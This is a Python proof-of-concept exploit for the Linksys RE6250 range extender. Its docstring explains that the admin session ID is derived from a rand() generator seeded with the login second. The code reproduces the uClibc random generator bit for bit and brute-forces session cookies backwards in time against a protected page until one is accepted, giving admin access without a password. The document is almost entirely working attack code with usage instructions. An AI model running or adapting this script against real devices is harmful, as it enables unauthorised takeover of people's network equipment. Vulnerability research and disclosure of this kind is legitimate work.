#!/usr/bin/env python3
"""
Linksys RE6250 - predictable admin session_id

On a successful web login, mod_ssi.so!gen_random_char() builds the 32-char
session ID like this:

    srand(time(0) + srv[141]);                  // seed = the second of login
    session_id[i] = token_char[rand() % 62];

That value is handed out directly as the session_id cookie, and
mod_auth.so!sub_1BBC() only compares it against the value kept by the server
via strcmp(). So anyone who knows (or guesses) the second in which the admin
logged in can compute the session ID offline, without the password.

(srv[141] is always 0 - its only writer addToken() is unreachable, so the
seed is simply time(0).)

Usage:
    python3 re6250_session_id_exp.py 192.168.154.128:8080

Note: the script walks backwards from the local time, so the host clock and
the device clock must agree.
"""
import sys
import time

import requests

# 62-char alphabet used by gen_random_char()
TOKEN_CHARS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Protected page: 200 when authenticated, 307 redirect to the login page otherwise
PROTECTED_PAGE = "/wireless/wireless_basic.shtml"


class UClibcRandom:
    """TYPE_3 additive-feedback RNG of uClibc 0.9.33.2 (rand() is random()).

    Bit-for-bit identical to the firmware implementation, so it can reproduce
    the session IDs generated by the device.
    """

    DEG = 31        # length of the state array
    SEP = 3         # distance between fptr and rptr

    def __init__(self, seed):
        seed &= 0xFFFFFFFF
        if seed == 0:               # srandom_r() replaces seed 0 with 1
            seed = 1

        # fill the state with the linear congruential expansion
        state = [seed]
        word = seed
        for _ in range(1, self.DEG):
            hi, lo = divmod(word, 127773)
            word = 16807 * lo - 2836 * hi
            if word < 0:
                word += 2147483647
            state.append(word)

        self.state = state
        self.fptr = self.SEP
        self.rptr = 0
        for _ in range(10 * self.DEG):   # discard the first 310 outputs
            self.rand()

    def rand(self):
        """Return 0 .. 0x7FFFFFFF."""
        total = (self.state[self.fptr] + self.state[self.rptr]) & 0xFFFFFFFF
        self.state[self.fptr] = total
        self.fptr = (self.fptr + 1) % self.DEG
        self.rptr = (self.rptr + 1) % self.DEG
        return total >> 1           # glibc drops the lowest bit


def gen_session_id(seed, length=32):
    """Reproduce gen_random_char(): seed -> session ID."""
    rng = UClibcRandom(seed)
    return "".join(TOKEN_CHARS[rng.rand() % 62] for _ in range(length))


def main():
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"
    url = f"http://{target}{PROTECTED_PAGE}"

    seconds = int(time.time())
    print(f"[*] target     : {url}")
    print(f"[*] start time : {seconds}")

    while True:
        seconds -= 1
        session_id = gen_session_id(seconds)

        response = requests.get(
            url,
            cookies={"session_id": session_id},
            timeout=3,
            allow_redirects=False,     # do not follow the 307, else it lands on the login page
            proxies={"http": None, "https": None},   # ignore the system proxy, talk to the target directly
        )

        print(f"[*] Trying timestamp={seconds}, session_id={session_id}, status={response.status_code}")

        if response.status_code == 200:
            print("[+] Found valid session!")
            print(f"[+] timestamp  = {seconds}")
            print(f"[+] Cookie     : session_id={session_id}")
            break


if __name__ == "__main__":
    main()
